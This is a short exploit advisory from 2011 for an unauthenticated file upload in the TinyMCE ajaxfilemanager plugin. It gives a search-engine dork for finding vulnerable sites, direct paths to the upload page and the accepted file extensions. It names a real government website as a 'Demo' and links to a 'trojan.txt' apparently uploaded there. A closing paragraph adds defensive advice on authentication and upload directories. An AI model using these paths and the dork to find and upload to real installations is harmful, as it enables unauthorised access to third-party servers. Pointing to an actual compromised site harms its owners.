#########################################################
# Title     : TinyMCE ajaxfilemanager Upload Vulnerability
# Author    : Dr Trojan
# Greets to all my friends and everyone I know (www.paksecteam.com)
# Vendor    : http://www.phpletter.com/Demo/Tinymce-Ajax-File-Manager/
# Email     : urduhack@gmail.com
# Date      : 29/05/2011
# Dork      : "tiny_mce/plugins/ajaxfilemanager"
# Category  : PHP [File Upload Vulnerability]
# Tested on : [Windows 7, Linux Ubuntu]
#########################################################

Exploit
# http://[localhost]/[path]/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
# http://[localhost]/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
# File Extension: [.txt],[.jpg],[.gif],[.bmp]

Demo
http://sns.yhgs.gov.cn/plugins/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php#

Preview
http://sns.yhgs.gov.cn/uploaded/temp/trojan.txt

Note
# The advisory does not state a root cause. The paths above indicate that the file manager page is reachable by direct request, so deployments should check that ajaxfilemanager.php requires an authenticated session and that the upload directory does not execute scripts.